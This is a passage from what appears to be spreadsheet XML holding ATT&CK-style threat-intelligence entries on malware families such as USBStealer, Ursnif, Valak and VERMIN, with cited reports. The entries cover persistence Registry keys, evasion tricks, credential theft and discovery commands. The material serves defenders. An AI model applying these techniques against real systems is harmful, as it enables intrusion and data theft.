  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) can capture desktop screenshots in the PNG format and send them to the C2 server.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>Some versions of [UPPERCUT](https://attack.mitre.org/software/S0275) have used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to gather the system’s hostname and OS version.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to gather the victim's proxy information.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to collect the current logged on user’s username from a machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to obtain the time zone information and current timestamp of the victim’s machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has used HTTP for C2, including sending error codes in Cookie headers.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) uses cmd.exe to execute commands on the victim’s machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>For all non-removable drives on a victim, [USBStealer](https://attack.mitre.org/software/S0136) executes automated collection of certain files for later exfiltration.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) automatically exfiltrates collected files via removable media when an infected device connects to an air-gapped victim machine after initially being connected to an internet-enabled victim machine. (Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>Once a removable media device is inserted back into the first victim, [USBStealer](https://attack.mitre.org/software/S0136) collects data from it that was exfiltrated from a second victim.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) exfiltrates collected files via removable media from air-gapped victims.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) has several commands to delete files associated with the malware from the victim.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) searches victim drives for files matching certain extensions (“.skr”,“.pkr” or “.key”) or names.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) mimics a legitimate Russian program called USB Disk Security.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>Most strings in [USBStealer](https://attack.mitre.org/software/S0136) are encrypted using 3DES and XOR and reversed.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) registers itself under a Registry Run key with the name "USB Disk Security."(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can collect information from an air-gapped host machine.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can detect the victim's file or folder list.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;net user&lt;/code&gt; to gather information about local accounts.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can check for connected USB devices.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;tasklist&lt;/code&gt; to gather information about the process running on the infected system.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;net view&lt;/code&gt; to gather information about remote systems.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can copy its installer to attached USB storage devices.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can execute rundll32.exe in memory to avoid detection.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can detect the infected machine's network topology using &lt;code&gt;ipconfig&lt;/code&gt; and &lt;code&gt;arp&lt;/code&gt;.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;netstat&lt;/code&gt; and &lt;code&gt;nbtstat&lt;/code&gt; to detect active network connections.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can execute various Windows commands.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) creates valid local users to provide access to the system.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) provides access to the system via SSH or any other protocol that uses PAM to authenticate.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of stealing usernames and passwords from browsers on the victim machine.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of downloading remote files.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of recording keystrokes.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of spreading to USB devices.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) can obtain information about the victim computer name, physical memory, country, and date.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) can obtain information about the victim's IP address.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) can obtain information about the victim usernames.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) is a rootkit used by [Turla](https://attack.mitre.org/groups/G0010).(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) uses a custom packer.(Citation: Symantec Waterbug)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords).(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used COM objects to execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ursnif](https://attack.mitre.org/software/S0386) has used encoded data in HTTP URLs for C2.(Citation: ProofPoint Ursnif Aug 2016)	</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has collected files from victim machines, including certificates and cookies.(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk.(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used a DGA to generate domain names for C2.(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used HTTP POSTs to exfil gathered information.(Citation: TrendMicro Ursnif Mar 2015)(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has deleted data staged in tmp files after exfiltration.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used COM properties to execute malware in hidden windows.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has dropped payload and configuration files to disk. [Ursnif](https://attack.mitre.org/software/S0386) has also been used to download and execute additional payloads.(Citation: TrendMicro PE_URSNIF.A2)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used tmp files to stage gathered information.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used Registry modifications as part of its installation routine.(Citation: TrendMicro BKDR_URSNIF.SM)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used [Tor](https://attack.mitre.org/software/S0183) for C2.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used &lt;code&gt;CreateProcessW&lt;/code&gt; to create child processes.(Citation: FireEye Ursnif Nov 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used an XOR-based algorithm to encrypt Tor clients dropped to disk.(Citation: ProofPoint Ursnif Aug 2016)	[Ursnif](https://attack.mitre.org/software/S0386) droppers have also been delivered as password-protected zip files that execute base64 encoded [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used PowerShell in download cradles to download and execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has gathered information about running processes.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used process hollowing to inject into child processes.(Citation: FireEye Ursnif Nov 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used a peer-to-peer (P2P) network for C2.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used [Reg](https://attack.mitre.org/software/S0075) to query the Registry for installed programs.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used Registry Run keys to establish automatic execution at system startup.(Citation: TrendMicro PE_URSNIF.A2)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has copied itself to and infected removable drives for propagation.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro Ursnif File Dec 2014)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used hooked APIs to take screenshots.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used [Systeminfo](https://attack.mitre.org/software/S0096) to gather system information.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has gathered information about running services.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has copied itself to and infected files in network drives for propagation.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro Ursnif File Dec 2014)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has injected code into target processes via thread local storage callbacks.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro PE_URSNIF.A2)(Citation: FireEye Ursnif Nov 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used a 30 minute delay after execution to evade sandbox monitoring tools.(Citation: TrendMicro Ursnif File Dec 2014)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used VBA macros to download and execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used HTTPS for C2.(Citation: TrendMicro Ursnif Mar 2015)(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used WMI classes to execute [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has registered itself as a system service in the Registry for automatic execution at system startup.(Citation: TrendMicro PE_URSNIF.A2)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has attempted to complicate forensic analysis by deleting all the files contained in &lt;code&gt;%APPDATA%\..\Local\Temporary Internet Files\Content.Word&lt;/code&gt; and &lt;code&gt;%APPDATA%\..\Local Settings\Temporary Internet Files\Content.Word\&lt;/code&gt;.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has the ability to download VBS files to the target computer.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) used &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\[a-f0-9A-F]{8}&lt;/code&gt; to maintain persistence.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has the ability to execute VBScript files.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) encrypts the collected files using 3-DES.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can perform audio capture.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt .(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) collects data stored in the clipboard.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) decrypts code, strings, and commands to use once it's on the victim's machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can delete files on the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can download and upload files to the victim's machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) collects keystrokes from the victim machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) is obfuscated using the obfuscation tool called ConfuserEx.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can get a list of the processes and running tasks on the system.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can perform screen captures of the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) uses WMI to check for anti-virus software installed on the system.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) is initially packed.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) collects the OS name, machine name, and architecture information.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) gathers the local IP address.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) gathers the username from the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) uses HTTP for C2 communications.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can download a module to search for and build a report of harvested credential data.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use the clientgrabber module to steal e-mail credentials from the Registry.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to decode and decrypt downloaded files.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate domain admin accounts.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can execute tasks via OLE.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to exfiltrate data over the C2 channel.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can communicate over multiple C2 hosts.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has downloaded a variety of modules and payloads to the compromised host, including [IcedID](https://attack.mitre.org/software/S0483) and NetSupport Manager RAT-based malware.(Citation: Unit 42 Valak July 2020)(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can execute JavaScript containing configuration data for establishing persistence.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate local admin accounts.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has been executed via Microsoft Word documents containing malicious macros.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to modify the Registry key &lt;code&gt;HKCU\Software\ApplicationContainer\Appsw64&lt;/code&gt; to store information regarding the C2 server and downloads.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can download additional modules and malware capable of using separate C2 channels.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability save and execute files as alternate data streams (ADS).(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to base64 encode and XOR encrypt strings.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used PowerShell to download additional modules.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate running processes on a compromised host.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use the Registry for code updates and to collect credentials.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used &lt;code&gt;regsvr32.exe&lt;/code&gt; to launch malicious DLLs.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used scheduled tasks to execute additional payloads and to gain persistence on a compromised host.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Valak](https://attack.mitre.org/software/S0476) has the ability to take screenshots on a compromised host.(Citation: Cybereason Valak May 2020)	 </t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can determine if a compromised host has security products installed.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used packed DLL payloads.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has been delivered via spearphishing e-mails with password protected ZIP files.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has been delivered via malicious links in e-mail.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has returned C2 data as encoded ASCII.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can determine the Windows version and computer name on a compromised host.(Citation: Cybereason Valak May 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to identify the domain and the MAC and IP addresses of an infected machine.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can gather information regarding the user.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used HTTP in communications with C2.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use &lt;code&gt;wmic process call create&lt;/code&gt; in a scheduled task to launch plugins and for execution.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[VaporRage](https://attack.mitre.org/software/S0636) can deobfuscate XOR-encoded shellcode prior to execution.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[VaporRage](https://attack.mitre.org/software/S0636) has the ability to check for the presence of a specific DLL and terminate if it is not found.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[VaporRage](https://attack.mitre.org/software/S0636) has the ability to download malicious shellcode to compromised systems.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[VaporRage](https://attack.mitre.org/software/S0636) can use HTTP to download shellcode from compromised websites.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) can download files.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) is capable of tunneling though a proxy.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) copies itself to disk and creates an associated run key Registry entry to establish.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) creates a backdoor by making a connection using a HTTP POST.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>Some [Volgmer](https://attack.mitre.org/software/S0180) variants use SSL to encrypt C2 communications.(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) deobfuscates its strings and APIs once its executed.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can delete files and itself after infection to avoid analysis.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can list directories on a victim.(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can download remote files and additional payloads to the victim's machine.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>Some [Volgmer](https://attack.mitre.org/software/S0180) variants add new services with display names generated by a list of hard-coded strings such as Application, Background, Security, and Windows, presumably as a way to masquerade as a legitimate service.(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) stores the encoded configuration file in the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security&lt;/code&gt;.(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) executes payloads using the Windows API call CreateProcessW().(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>A [Volgmer](https://attack.mitre.org/software/S0180) variant is encoded using a simple XOR cipher.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather a list of processes.(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) checks the system for certain Registry keys.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) uses a simple XOR cipher to encrypt traffic and files.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather system information, the computer name, OS version, drive and serial information from the victim's machine.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
